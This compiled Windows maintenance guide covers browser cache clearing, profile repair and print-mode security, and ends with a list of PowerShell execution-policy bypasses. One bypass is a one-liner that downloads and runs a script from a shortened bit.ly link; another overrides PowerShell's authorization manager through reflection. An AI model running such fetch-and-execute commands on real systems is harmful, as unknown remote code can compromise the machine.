Windows Maintenance Instructions

Browsers

Clear Web Browser's Cache

Before you begin

Clearing your web browser's cache, cookies, and history may remove data such as the following:

- Saved passwords
- Address bar predictions
- Shopping cart contents, etc.

While you should clear your web browser's cache, cookies, and history periodically in order to prevent or resolve performance problems, you may wish to record some of your saved information first. If you are unable to do so, see Troubleshooting alternatives below.

Notes:

- For desktop browsers, to quickly open menus used to clear your cache, cookies, and history, ensure that the browser is open and selected, and press Ctrl-Shift-Delete (Windows) or Command-Shift-Delete (Mac). If this doesn't work, follow the appropriate instructions below.
- If the instructions below don't exactly match what you see, you may need to update your web browser to the latest version.
- If you don't see instructions below for your specific version or browser, search your browser's Help menu for "clear cache". If you're unsure what browser version you're using, from the Help menu or your browser's menu, select About [browser name]. In Firefox, if you don't see the menu bar, press Alt.

Desktop browsers

Microsoft Edge

Important: Microsoft Edge Legacy support ended on March 9, 2021. If you still have Edge Legacy, UITS recommends installing the new Chromium-based Microsoft Edge by running Windows Update.

- In the top right, select the Hub icon (looks like a star with three horizontal lines).
- Select the History icon (looks like a clock), and then choose Clear all history.
- Select Browsing history, then Cookies and saved website data, and then Cached data and files.
- Select Clear.
- After the "All Clear!" message appears, exit/quit all browser windows and re-open the browser.

Chrome

- In the browser bar, enter: chrome://settings/clearBrowserData
- At the top of the "Clear browsing data" window, select Advanced.
- Select the following:
  - Browsing history
  - Download history
  - Cookies and other site data
  - Cached images and files
- From the "Time range" drop-down menu, you can choose the period of time for which you want to clear cached information; to clear your entire cache, select All time.
- Select CLEAR DATA.
- Exit/quit all browser windows and re-open the browser.

Firefox

- From the History menu, select Clear Recent History... . If the menu bar is hidden, press Alt to make it visible.
- From the "Time range to clear:" drop-down menu, select the desired range; to clear your entire cache, select Everything.
- Next to "Details", select the down arrow to choose which elements of the history to clear; to clear your entire cache, select all items.
- Select Clear Now.
- Exit/quit all browser windows and re-open the browser.

Opera

- From the Opera menu, select Settings, then Privacy & Security, and then Clear browsing data... .
- In the dialog box that opens, from the "Obliterate the following items from:" drop-down menu, select The beginning of time.
- Select the following:
  - Browsing history
  - Download history
  - Cookies and other site data
  - Cached images and files
- Select Clear browsing data.
- Exit/quit all browser windows and re-open the browser.

Safari 8 and later

- From the Safari menu, select Clear History... or Clear History and Website Data... .
- Choose the desired time range, and then select Clear History.
- Select Safari > Quit Safari or press Command-Q to exit the browser completely.

Mobile browsers

Android

The steps to clear your cache, cookies, and history may differ depending on the model of your Android device and your preferred browser, but you should be able to clear your cache and data from your application management settings menu:

- Go to Settings and choose Apps or Application Manager.
- Swipe to the All tab.
- In the list of installed apps, find and select your web browser.
- Select Clear Data, and then Clear Cache.
- Exit/quit all browser windows and re-open the browser.

Chrome for Android

- Select Chrome menu, then Settings, and then (Advanced) Privacy.
- From the "Time Range" drop-down menu, choose All Time.
- Check Cookies and Site data and Cached Images and Files.
- Select Clear data.
- Exit/quit all browser windows and re-open the browser.

Safari for iOS

- Open your Settings app.
- Select Safari.
- Select Clear History and Website Data and confirm.
- Exit/quit all browser windows and re-open the browser.

Chrome for iOS

- Select Chrome menu, then Settings, and then Privacy.
- Select Clear Browsing Data.
- Choose the data type you want to clear, and then select Clear Browsing Data.
- Exit/quit all browser windows and re-open the browser.

Change your display refresh rate in Windows

The refresh rate of a display is the number of times per second that the image refreshes on the screen. For example, a 60Hz display will update the screen 60 times per second.

Overall, the refresh rate determines how smoothly motion appears on your screen. For example, if you’re playing a game that has a lot of fast-moving action, a higher refresh rate can help improve your overall gaming experience to keep up with the action. A higher refresh rate can also help you get a better experience with smoother motion when you're browsing the web or using a digital pen to write or draw.

A higher refresh rate can also reduce battery life because it uses more power. So if you're using a laptop or tablet and want to save some battery, you could lower the refresh rate. However, that might also reduce the overall experience when you're using your device.

Windows 10

To change the refresh rate in Win 10

- Select the Start button, then select Settings > System > Display > Advanced display settings.
- Under Refresh rate, select the rate you want.

The refresh rates that appear depend on your display and what it supports. Select laptops and external displays will support higher refresh rates.

Windows 11

To change the refresh rate in Win 11

- Select Start > Settings > System > Display > Advanced display.
- Next to Choose a refresh rate, select the rate you want.

The refresh rates that appear depend on your display and what it supports. Select laptops and external displays will support higher refresh rates.

Note: You might see the word “dynamic” next to some refresh rates that are listed. Dynamic refresh rates will increase the refresh rate automatically when you’re inking and scrolling, and then lower it when you’re not doing these types of things. This helps to save battery and provide a smoother experience.

Please DISABLE dynamic refresh rate. Dynamic refresh rate will interfere with displaying images on the Smartboards.

How to change audio playback medium in Windows

Windows 10

To change the Default Audio Device, do the following.

- Click on the sound volume icon in the system tray.
- Click on the up arrow in the sound flyout.
- Choose the desired audio device from the list.

Export drivers from Windows

PowerShell – Export drivers from Windows

You can easily export drivers from Windows OS using PowerShell. Using the Export-WindowsDriver cmdlet, you can export all third-party drivers from a Windows image to a destination folder.

The advantage of exporting the drivers is that you can restore them when you require. Once you perform a Windows 10 clean install, with this backup you can quickly install all the necessary drivers. In addition, if you deploy the OS using MDT, you can always import the drivers and use them to deploy using Configuration Manager.

The Export-WindowsDriver cmdlet exports all third-party drivers from your computer to a destination folder. You can either export drivers from the running operating system or export drivers from an offline image.

Export-WindowsDriver Parameters

There are several parameters which you can use while running the Export-WindowsDriver cmdlet.
Some of the parameters include:

    -Destination – Specify a folder or directory where you want to export third-party drivers.
    -LogLevel – Specifies the maximum output level shown in the logs.
    -LogPath – You can log the export process by adding the log file name and path.
    -Path – Specifies the full path to the root directory of the offline Windows image that you will service.
    -WindowsDirectory – Enter the relative path to the Windows directory relative to the image path.
    -SystemDrive – Specifies the path to the location of the BootMgr files.
    -ScratchDirectory – Specifies a temporary directory that will be used when extracting files for use during servicing.

PowerShell – How to Export drivers from Windows

To export drivers using PowerShell from Windows 10

- On your Windows 10, right click Start and click Windows PowerShell (admin).
- Enter the command Export-WindowsDriver -Online -Destination D:\Drivers. The D:\Drivers is the folder where all of your computer’s third-party drivers will be exported.
- Now go to the destination folder and you will see the folders containing the drivers.

So next time when you install Windows 10, you don’t need to go to vendors' websites and search for drivers. With this backup you can quickly install all the necessary drivers.

And finally let me clarify the use of the below two commands.

- Export-WindowsDriver -Online -Destination D:\Drivers – Use this command to export the computer’s third-party drivers to the destination folder.
- Export-WindowsDriver -Path C:\Windows_Image -Destination D:\Drivers – Use this command when you want to export drivers from the mounted offline Windows image to the destination folder.

How to Delete a User Profile on Windows

The first time a user logs in on a Windows computer, a user profile is created and stored on the local hard disk.
This profile contains all settings, from wallpaper to email details and network connections. If you’ve created multiple user profiles on your PC over time, this tutorial shows how to delete a user profile on Windows that is no longer needed.

1. Advanced System Properties

The easiest way to delete an unnecessary user profile is by accessing the Advanced System Properties on your Windows PC.

- Press Win + R on your keyboard to launch the Run dialog, type systempropertiesadvanced in the box, and click “OK.”
- In the “Advanced” tab, click the “Settings” button under “User Profiles.”
- From the list of user profiles stored on your Windows computer, select the one you don’t need, and click the “Delete” button.
- Click “Yes” in the confirmation dialog that pops up on your screen. The user profile has now been successfully deleted from your computer.

2. Settings App

You can also delete a user profile and all of its associated data from your Windows PC by using the Settings app.

- Click the Start button, and launch the Settings app.
- Click “Accounts” in the left pane, scroll down and click “Other users” in the right pane.
- You will see a list of other users accessing your computer. Click the arrow next to the user profile that you want to delete.
- Click the “Remove” button.
- Click “Delete account and data,” and you’re done.

3. Registry Editor

If you prefer, you can also delete a user profile from Windows through the Registry Editor. Make sure you create a backup of the registry before you proceed, in case something goes wrong during the process.

- Press Win + R to launch the Run utility, then type regedit in the box, and click “OK.”
- Navigate to the following path on the Registry Editor:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

- In the left pane, you’ll find multiple keys under the ProfileList folder.
  Click each subfolder one by one.
- In the right pane, find the path to the profile you wish to delete in the “Data” field for the “ProfileImagePath” key. In this example, we’re looking to remove the “vritr” user.
- Right-click the ProfileImagePath key associated with the user profile you are looking to eliminate and select “Delete.”
- Click “Yes” in the confirmation dialog to remove the user profile from your Windows computer.

4. PowerShell

With PowerShell, you can do all kinds of things, including deleting user profiles, as shown in the steps below:

- Press Win + X, and click “Terminal (Admin)” to launch PowerShell.
- Type the below command, and press Enter to view the list of user profiles on your computer. Make a note of the user profile you want to remove from your PC.

    Get-LocalUser

- To delete a specific user profile, use the below command, followed by Enter. Replace <username> with the name of the user profile you want to delete from your Windows computer.

    Remove-LocalUser -Name "<username>"

- Since you won’t see a success message for the above command, you can use the same command in step #2 to verify whether the user profile was deleted.

5. File Explorer

You can also delete a user profile and its data on a Windows PC via the File Explorer app, but make sure you are logged in as an administrator before you attempt to do so.

- Press Win + E to launch File Explorer and click “This PC” in the left pane.
- Double-click “Windows (C:)” under “Devices and drives.”
- Click on the “Users” folder.
- Select the name of the user profile you wish to delete, and press the Del key on your keyboard to delete the user profile from your Windows PC.

Cleaning Up Your Windows PC

While deleting inactive user profiles will not significantly free up storage on your “C:\” drive, learn additional methods to recover free space.
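
Before changing anything under ProfileList (the Registry Editor method above), it helps to see every entry at once. The following PowerShell audit is an added example, not part of the original tutorial: it backs up the key, then lists each entry's SID, account, profile folder, State and any .bak duplicate without modifying the registry. The backup file name is an assumption.

```powershell
# Audit of the ProfileList key; run in an elevated PowerShell session.
# Nothing here edits the registry. The only file written is the .reg backup.
$regPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList'

# Back up the key first (file name is an assumption; use any writable path).
$backup = Join-Path $env:USERPROFILE 'ProfileList-backup.reg'
reg.exe export 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList' $backup /y | Out-Null

# Profiles as Windows itself tracks them, indexed by SID.
$known = @{}
Get-CimInstance -ClassName Win32_UserProfile | ForEach-Object { $known[$_.SID] = $_ }

$keys  = Get-ChildItem -Path $regPath
$names = $keys.PSChildName

$report = foreach ($key in $keys) {
    $name  = $key.PSChildName                 # SID, possibly with a .bak suffix
    $sid   = $name -replace '\.bak$', ''
    $props = Get-ItemProperty -Path $key.PSPath
    $path  = $props.ProfileImagePath

    # Resolve the SID to an account name; deleted accounts fail to translate.
    $account = try {
        ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
            [System.Security.Principal.NTAccount]).Value
    } catch { '<unresolved>' }

    [pscustomobject]@{
        Key          = $name
        Account      = $account
        ProfilePath  = $path
        FolderExists = [bool]($path -and (Test-Path -LiteralPath $path))
        State        = $props.State
        IsBak        = $name -like '*.bak'
        HasBakTwin   = ($name -notlike '*.bak') -and ($names -contains "$name.bak")
        Loaded       = if ($known.ContainsKey($sid)) { $known[$sid].Loaded } else { $null }
    }
}

$report | Sort-Object Key | Format-Table -AutoSize

# Entries to review before any edit or deletion: .bak duplicates, entries whose
# folder is gone, and profiles that are currently loaded (in use).
$report |
    Where-Object { $_.IsBak -or $_.HasBakTwin -or -not $_.FolderExists -or $_.Loaded } |
    Format-List Key, Account, ProfilePath, State, Loaded
```

An entry whose account shows as `<unresolved>` belongs to an account that no longer exists; a profile with `Loaded` set to True is in use and should not be removed in that session.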
If you’ve encountered the “User profile service failed the sign-in” error message, try to delete the user profile and create a new one.

How to Fix the “User Profile Service Failed the Sign-in” Error for Windows

Are you getting the “User Profile Service failed the sign-in” or “User profile cannot be loaded” error during Windows startup? This message is shown as soon as you type your password in the Windows logon screen, and your default user profile fails to launch. In its place, a corrupt user profile takes over, changing your lock screen and desktop background. Because the proper profile wouldn’t load, you’re unable to log in to your system. If you’re facing this frustrating issue, one of our solutions below will resolve it immediately.

Causes of “User Profile Service Failed the Sign-in” Error

There are many reasons you may encounter the “User profile failed the sign-in” error. Variations of this error include: “User profile cannot be loaded” and “User profile service failed the logon.” If you get any of these error messages, it means the default Windows user profile has been corrupted, which can be traced to one or more of the following factors:

- Improper Windows update: User Account Control (UAC) is designed to prevent unauthorized changes to your Windows device. Any irregular or unfinished updates or a crash can sometimes corrupt host files that are required for UAC to work properly.
- Partition resizing error: when resizing partitions from Disk Management, those parts can occasionally get corrupted, leading to an incorrect user profile.
- Antivirus program: if an antivirus program was scanning your system while you tried to log in, it can abort the correct user profile and launch an incorrect one.
- Improper shutdown and restarts in guest logons: if you did not exit smoothly from a local account created on your PC, you may encounter a user profile error on a subsequent login.

Solutions for User Profile Service Failed the Logon Error in Windows

The good thing is that none of the above causes are major concerns. You can easily repair the corrupted user profile using one of the troubleshooting solutions below. You should first attempt the first few easy methods. Go for the more intricate and time-consuming solutions toward the end – only if the easy ones fail to resolve the problem.

1. Restart or Shut Down Windows From Its Lock Screen

Sometimes you only need a simple restart or shutdown from the lock screen window to fix the issue.

- Whether you’re inside an administrator or guest logon, use Win + L to exit, and go to the Windows lock screen.
- Navigate to the administrator profile (if a guest profile was previously used to log in), and click the lock screen shutdown/restart options.
- Make sure you log in as the administrator during the subsequent startup. We can help if you need to reset your administrator password.

2. Delete a Local User Account in Windows

If the user profile error is due to improper shutdowns and restarts during a guest logon, you may want to delete the unnecessary local account temporarily.

- After signing in to your computer on an incorrect user profile, start the Windows Run command option using Win + R, and enter netplwiz.
- You will encounter the Advanced User Accounts Control Panel screen. Enter your administrator password to proceed. Sometimes there will be an error if the system refuses to accept your admin password. In that case, use the Windows Safe boot to perform these steps. (Described in the FAQ below.)
- Click the “Remove” option next to your guest/local account. Even if you’re currently logged in on your computer with the local account, the local profile here will be removed.
- Use Win + L to exit the local account logon window.
- Restart the computer, and make sure to use your regular Microsoft account to log back in.

3. Move NTUSER.Dat File to Default Username Folder

A user profile consists of personalized menu items for desktop, downloads, documents, music, videos, and saved links that are stored in a folder inside “C:/Users.” For each of these profiles, a .DAT file called NTUSER.DAT is created by Windows. It contains personalized user settings. Try moving the file associated with the buggy profile to a default username folder.

- Go to the necessary local account inside “C:/Users,” and press Ctrl + X to cut the NTUSER.DAT file for that account.
- Move the .DAT file into the “Default” username folder. You may not be able to see this folder. If so, change the “View -> Show” to “Hidden items” in File Explorer.
- Delete the local account folder, and restart the PC to see whether the proper user profile is loading.

4. Windows User Profile Repair Using Command Prompt

The evergreen Command Prompt can fix some of the hard disk-related issues that may have caused the user profile error problem.

- Go to Start, and search for “Command Prompt.” Select “Run as administrator” under the result.
- Perform a Deployment Image Servicing and Management Tool (DISM) scan, which helps repair the Windows image and may solve the user profile services error.

    DISM.exe /Online /Cleanup-image /scanhealth

- Likewise, a System File Checker (SFC) command is the best way to repair corrupt Windows files, including user profile settings.

    sfc /scannow

5. Use Windows Registry Editor in Safe Mode

The Windows Registry Editor (Regedit) is one of the best solutions to fix the “User profile service failed the sign-in” error. For this, the troubleshooting is achieved in Safe mode.
- In Windows 11, go to “Advanced startup” from the Search menu. For Windows 10, the corresponding option is “Change advanced startup options.”
- Click “Restart now” to initiate an advanced restart.
- Select “Troubleshoot” on the blue screen.
- Go to “Advanced options -> Startup settings,” and initiate another restart of the device.
- Following the restart, you will see a number of startup settings that can be accessed using the number keys (1-9) or function keys (F1-F9). Select the option to “Enable safe mode.”
- Once you sign in, you will enter Windows in Safe Mode. Very minimal options are visible in this mode.
- Start the Windows Run command option using Win + R, and enter regedit. This task will be automatically created with administrator privileges.
- Navigate to the following path in the Registry Editor:

    Computer\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList

- Check the last few entries under “ProfileList” to see whether there are any duplicates, e.g., the entries have similar names, but at least one will contain a .BAK file. This extension will appear at the end of one of the items in the “Name” column. For instance, if you open one of the ProfileList folders, you may see .BAK after any of the values listed. If you don’t see anything with this extension, skip to the bottom of the section.
- If you do have a value with the extension, and it’s present in the last entry, rename the .BAK extension to just .BA.
- For any duplicate entry, rename it to something else, but keep the .BAK extension.
- Delete any surplus .BAK extensions, if present, for duplicate entries. Delete the .BA extension in the entry that was just renamed.
- Right-click and modify the State key of the profile entry from where the .BAK was removed. Basically, we are switching the active default user profile through a minor registry tweak.
- Change the hexadecimal DWORD value from a numerical value to “0.” Click “OK” to save the settings.
- Restart the PC in normal mode.
The “User profile service failed the logon” error should be gone once you log in again.

No .BAK File?

If you don’t have a .BAK file, see the workaround below.

- Open File Explorer, and navigate to “C:\Users\Default\AppData\Local\Application Data”
- If you see another folder inside this one named “Application Data,” delete it, and restart your computer. If you don’t have an Application Data folder at all, this fix will not apply.

6. Restart the User Profile Service

Occasionally, third-party software and apps stop the User Profile service from running, resulting in this error. Restart it using Command Prompt:

- Open Command Prompt, and run it as an administrator as shown above.
- Enter the following command, and press Enter:

    sc config ProfSvc start= auto

- At the next prompt, enter the following command, and press Enter:

    sc start ProfSvc

- Restart your computer to fix the error. If these commands won’t run, try restarting your PC in Safe Mode, then performing the above.
- If another app or program has changed the status of this service, it may continue to stop. To ensure it starts automatically with Windows, open a Run dialog window, and type services.msc.
- Scroll until you see “User Profile Service.” If it doesn’t say “Automatic” under the “Startup Type” column, right-click “User Profile Service,” and select “Properties.”
- Change “Startup Type” to “Automatic,” and click “Apply” to save the changes. You may need to restart your PC to log in correctly.

7. Reset Windows PC

If all the above options fail, use the “Reset” option to go back to a clean factory reset of your Windows operating system. You have to be connected online to achieve this cloud-based reset.
The Windows 11 reset method has been covered in detail, but the essential steps, which are common with Windows 10, too, are summarized below:

- Go to “System -> Recovery -> Reset this PC,” and click “Reset PC.”
- Choose “Keep the files” or “Remove everything.” Choose the former option so that you don’t need to save a backup. It’s still a good idea to back up your files, just in case anything goes wrong.
- Select the “Cloud download” option to reinstall your version of Windows. The download will take some time to finish.
- Once you see the “Ready to reset the PC” screen, click “Next” to proceed.
- Sit back and wait for the reset to finish, as the download will take some time. The entire procedure can consume anything from a few hours to an entire day, so we recommend the reset method only if the other methods don’t solve the problem.

Frequently Asked Questions

How do I fix the "User profile failed" error during sign-in for Windows 8/8.1 and Windows 7?

If you’re using an older Windows version, such as 8.1/8/7, only a few of the above-described solutions will be able to address the user profile error. You can try a restart, use DISM and SFC scans in Command Prompt, and move the NTUSER.DAT file to a default folder. The options to delete a local user account and enable a cloud-based reset will not work.

How do I solve the “We can’t sign in to your account” error while restarting the User profile service?

Sometimes, while restarting the user profile service in guest/local account mode (Section 6), you’re unable to sign in to your Administrator account. To solve the problem, boot into your Windows device in Safe Mode, and perform the same steps outlined in section 2. Then, repeat the steps from Section 6 to restart the User Profile Service.

Can other software or Windows updates interfere with the User Profile Service?

Sometimes it can.
If you start getting this error the next time you sign in after installing something new, try uninstalling the new software to see whether that fixes the problem. If your PC recently installed updates, try uninstalling them and updating again.

- Go to “Start,” and search for “Windows updates.”
- Select “Update history” and “Uninstall updates” under the list of recently installed updates.
- Select what you want to uninstall, and restart your PC.

Image credit: Freepik. All screenshots by Crystal Crowder and Sayak Boral.

Windows Protected Print Mode (WPP)

Should I switch on WPP now?

Not yet! PaperCut is actively working on a solution to support printing with Windows Protected Print Mode. Sign up for early access through our Percolator program.

What is Windows protected print mode?

Windows protected print mode (WPP) is a security-enhanced printing platform for Windows that runs with lower privileges and uses Internet Printing Protocol (IPP) to eliminate the need for third-party drivers. Together, these remove significant security risks that can lead to attackers gaining SYSTEM-level access.

Whether you’re an IT manager, security professional, or business owner, understanding the impact and benefits of WPP is essential as it changes the landscape of print infrastructure. This page provides a comprehensive overview of WPP, its timeline, and how your organization can prepare for and benefit from this powerful security feature.

Why Microsoft is introducing Windows Protected Print Mode

According to Microsoft, 9% of Windows security issues reported to the Microsoft Security Response Center (MSRC) were caused by print stack-related issues. The fact that the spooler runs with system privileges and has to load code over the network makes the entire operating system vulnerable to malware.
Print Nightmare allowed hackers to exploit this vulnerability to install programs remotely, view and delete data or even create new user accounts with full user rights. Another spooler-related weakness was exploited by the Stuxnet virus, which was used as a digital weapon to gain remote access to the computers that controlled centrifuges at an Iranian uranium enrichment plant. This allowed the attackers to configure the fast-spinning centrifuges to tear themselves apart.

Print Nightmare patches are a temporary workaround that now requires admin rights to install printers. The admin rights requirement only protects a shared computer, where one user might have installed a printer driver with malware that would compromise others on the computer too. This change doesn’t fix the spooler privilege issue that is exploitable by a driver with malware, and it introduces user experience issues by forcing admin privileges just to install printers.

The proper solution is Windows Protected Print Mode, as it removes the fundamental flaw of drivers and moves the world of printers forward to finally settle on the IPP standard. At PaperCut, we support Microsoft’s decision, even though it will cause some adoption friction.

As an aside, Windows isn’t the only operating system plagued by a vulnerable print platform. CUPS, used in Linux, macOS, and ChromeOS, also has a long history of security issues. In September 2024, new reports showed how it is possible to remotely execute code on a Linux computer without requiring authentication. Some Linux distributions, like Ubuntu, are planning to limit access to the rest of the operating system by moving CUPS into a containerised Snap App.

How Windows Protected Print Mode works

WPP uses modern standards and secure communication methods to ensure a robust and consistent printing experience. Here are some of the key details.
Printer and job delivery is based on Internet Printing Protocol (IPP)

WPP uses IPP as the core transport protocol - a well-established, open standard that provides a framework for printer discovery, job submission, and status tracking. IPP allows WPP to support advanced features such as finishing options, job status updates, and access control, enabling a richer printing experience. The port monitor used when adding a WPP print queue is Microsoft’s new IPP port, which provides a richer set of IPP functions.

No more third-party printer drivers and modules

WPP forces a driverless printing model. When it’s enabled, client computers can no longer load third-party printer drivers, eliminating the risk of attackers loading malicious code. In addition to the printer drivers, the loading of other, less well-known modules, such as third-party print providers, is blocked. WPP prevents Point and Print from ever installing third-party printer drivers. This eliminates the risk of an attacker pretending to be a printer and tricking users into installing malicious software.

Common print spooler tasks are now run at lower privilege level

Since the drivers are no longer required to run as SYSTEM, most common spooler tasks can now run as USER. This reduces the risk of a rogue or a buggy program taking down the whole machine. The impact will be limited to actions only the user can perform.

The challenges of transitioning to Windows Protected Print Mode

- When you switch on Windows Protected Print Mode, the existing print queues and drivers on the computer will be permanently deleted. You won’t get them back if you decide to switch WPP off.
- It is an all-or-nothing setting. You can’t use a driver for some printers while using Windows Protected Print Mode for others. If WPP is enabled, print drivers are nonexistent.
- Not all printers are equal. Based on a sample of thousands of printer models we assessed, roughly 70% of printers will work seamlessly over IPP.
  For the rest, they will either function with reduced speed, lower quality or not at all.
- Existing scripts that system admins may have in use, such as printui scripts to manage printers, won’t work anymore.

How enabling WPP will affect organizations and their print infrastructure

To understand how enabling Windows Protected Print Mode might affect organizations, let’s use a hypothetical scenario:

The university IT administrator's dilemma

Alex, the lead IT administrator at a mid-sized university, heard about WPP during a recent security conference. The idea of having a more secure, driverless printing environment using the Internet Printing Protocol (IPP) sounded like a great way to tighten the university’s security. With hundreds of devices across different departments, ensuring that no vulnerabilities could be exploited through outdated drivers or unmonitored print processes seemed like a major win.

Eager to implement WPP, Alex decided to enable it across the university’s network, confident that this would reduce risks and future-proof the printing setup. The change went live during a routine maintenance window, with IT teams monitoring performance and response.

However, as the next day began, emails started flooding in from staff and students across campus. The university's fleet, consisting of older and newer printers, faced a serious issue: 30% of the printers weren’t working! Despite being reliable for everyday use, they weren't Mopria compliant and/or IPP-compatible.

The Issues staff and students were experiencing

- Printer Recognition Problems: Some of the older printers weren’t showing up in Windows’ printer lists anymore and attempts to manually add printers were failing with error messages “can’t add”.
- Loss of Features: Other printers were partially working, but features like stapling, colour management, and even advanced security protocols like pull printing were no longer functional.
This disrupted the workflows of departments that relied heavily on advanced printing tasks. User Frustration: Professors were missing critical deadlines to print exams, and research departments couldn’t print their reports. The more Alex’s team tried to patch things up, the more they realised the issue was systemic: these printers did not support IPP and were reliant on specific drivers that WPP no longer allowed. Lessons learned In retrospect, Alex realized that turning on WPP without fully assessing the fleet was premature.  While the security benefits were undeniable, it required careful planning and implementation. Will my printer work with Windows Protected Print Mode? Mopria has an  online list of certified printers  you can use to check your printer models. Although a printer could be listed as Mopria-certified, it doesn’t necessarily mean it will work with WPP or that you will get the most out of your printer once you switch over to using IPP in WPP mode. At the time of writing, Windows Protected Print Mode deems some IPP attributes mandatory, even though they are technically specified as optional according to Mopria standards, such as the hardware ID. Additionally, WPP requires some IPP values to be in a specific format that some printers do not follow. Some printers that support IPP don’t necessarily support PDF-based spool files; instead, they only support formats like URF/raster or JPEG. This still follows the specification, but these spool files will be much larger and often print in lower quality. In addition to being larger, these formats require the entire print job to be submitted to the printer before the printer can start printing them, which results in slower printing or even failure to print larger documents as the printer can’t store the entire print job. For now, the best way to confirm that your printer is ready for WPP is to enable WPP on a test Windows machine and print from it. 
If your printer can’t be found when WPP is enabled, you know it’s incompatible. Check different finishing options, especially more advanced options like stapling and tray selection if the printer supports it. Options for printers that are non-compliant with Windows Protected Print Mode We are making changes in PaperCut MF/NG and PaperCut Hive/Pocket to support printers that are WPP ready and also printers that are not WPP ready. You can  sign up for PaperCut MF/NG Early Access  now. PaperCut Hive/Pocket Early Access registrations will open in November. Alternatively, if your printers are not ready, your printer manufacturer may soon provide a firmware update if your printers are not too old, so keep an eye out. How to switch on Windows Protected Print Mode Enable WPP mode via Settings 1. Navigate to Settings > Bluetooth & devices > Printers & scanners > Printer preferences Click ‘Set Up’. Windows will display a warning message. Additionally, if WPP-incompatible print queues (such as standard TCP/IP queues) were already installed, Windows would warn that they would be removed. After successful completion, WPP should be turned on. Enable WPP mode via Group Policy Via Group Policy Editor > Administrative Templates > Printers > Configure Windows protected print > Edit Timeline and updates Note that these dates are subject to change: 01 OCTOBER 2024 When you enable Windows Protected Print Mode for the first time after the 24H2 upgrade, the existing incompatible (such as TCP/IP) queues may not get deleted. Also, you may still be able to create TCP/IP print queues. A system reboot may fix the issues. This is a known issue, and Microsoft is working on fixing it. 04 OCTOBER 2024 Microsoft is pushing the patch  KB5043178  to fix Windows protected print anomalies soon. The estimated rollout date is 8th October. NOVEMBER 2024 First PaperCut MF/NG Windows Protected Print Mode release planned. JANUARY 2025 First PaperCut Hive/Pocket Windows Protected Print Mode release planned. 
2027
Windows Protected Print Mode is enabled by default.

Further reading

- The official Microsoft Windows Protected Print Mode announcement
- More from Microsoft about WPP
- Microsoft’s Windows protected print mode FAQ

How to Login to a Company Computer for the First Time - Active Directory

Follow these steps to log in to your computer for the first time after joining the company:

Step 1: Get Your Login Details

- Username: Provided by IT (e.g., jdoe). This is what you use to log in to your computer.
- Temporary Password: A one-time password provided by IT for your first login.
- Email Address: Separate from your username, used for communication (e.g., yourname@companydomain.com).

Step 2: Turn On the Computer

Power on your computer and wait for the login screen to appear. Make sure the device is connected to the company network:

- At the office: The computer will usually connect automatically.
- Working remotely: Connect to Wi-Fi or an Ethernet cable.

Step 3: Log In

Click Other User:

- Enter your Username: Use the username provided (e.g., jdoe). Do not include “@companydomain.com”.
- Enter your Password: Use the temporary password provided by IT.
- Change Your Password: You will be prompted to create a new password. Choose one that meets company security standards: Use a mix of uppercase, lowercase, numbers, and symbols. Example: SecurePass2024!

Step 4: Confirm Access

After logging in:

- Ensure you can access your desktop.
- Open tools like email, shared folders, or other company applications to confirm everything works.

Step 5: Get Help if Needed

If you experience issues:

- Double-check your username and password.
- Ensure your computer is connected to the network.
- Contact IT for assistance.

15 Ways to Bypass the PowerShell Execution Policy

Author: Scott Sutherland
Source: NetSPI

🔎 What is the PowerShell Execution Policy?

The execution policy determines what type of PowerShell scripts (if any) can run. By default, it's set to Restricted, which blocks all scripts. It's meant to prevent accidental execution, not as a true security control — which is why it’s easy to bypass.

💡 Why Bypass It?

- PowerShell is native to Windows
- Maintenance of a Server Requiring .PS1 scripts created by another organization.
- Can interact with the Windows API
- Can run in memory (no disk writes)
- Often trusted by whitelisting tools
- Used in many open-source pentest frameworks

🔍 View Current Execution Policy

    Get-ExecutionPolicy
    Get-ExecutionPolicy -List | Format-Table -AutoSize

🧪 Test Script Example

    Write-Host "My voice is my passport, verify me."

---

🚪 15 Ways to Bypass Execution Policy

1. Paste in Interactive Console

Directly run the script in PowerShell. No config changes or file writes.

2. Echo to PowerShell

    echo Write-Host "My voice is my passport" | powershell -noprofile -

3. Pipe File via Type/Get-Content

    Get-Content .\runme.ps1 | powershell -noprofile -
    type .\runme.ps1 | powershell -noprofile -

4. Download + Invoke-Expression

    powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"

5. Use -Command Switch

    powershell -command "Write-Host 'Hello'"

6. Use -EncodedCommand

    $cmd = "Write-Host 'Hello'"
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
    [Convert]::ToBase64String($bytes)

Then run with:

    powershell -EncodedCommand

7. Invoke-Command

    Invoke-Command -ScriptBlock {Write-Host "Hello"}

Can also pull policy from a remote host:

    Invoke-Command -ComputerName server -ScriptBlock {Get-ExecutionPolicy} | Set-ExecutionPolicy -Force

8. Invoke-Expression (iex)

    Get-Content .\runme.ps1 | Invoke-Expression

or

    gc .\runme.ps1 | iex

9. Use -ExecutionPolicy Bypass

    powershell -ExecutionPolicy Bypass -File .\runme.ps1

10. Use -ExecutionPolicy Unrestricted

    powershell -ExecutionPolicy UnRestricted -File .\runme.ps1

11. Use -ExecutionPolicy RemoteSigned

    powershell -ExecutionPolicy RemoteSigned -File .\runme.ps1

12. Swap AuthorizationManager (Temporary)

    function Disable-ExecutionPolicy {
        ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue($executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (New-Object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
    }
    Disable-ExecutionPolicy

13. Set Policy for Process

    Set-ExecutionPolicy Bypass -Scope Process

Only for this session.

14. Set Policy for Current User

    Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

15. Edit Registry for Current User

Modify:

    HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell

Add/modify string value ExecutionPolicy = Unrestricted

---

✅ Wrap Up

PowerShell’s execution policy is a soft restriction — not a security boundary. Microsoft even provides native ways to bypass it. Use these techniques for legitimate automation, testing, and administration.

Adapted from NetSPI — original blog post

Troubleshooting Windows Server VM Reboot Loop & INACCESSIBLE_BOOT_DEVICE on XCP-ng

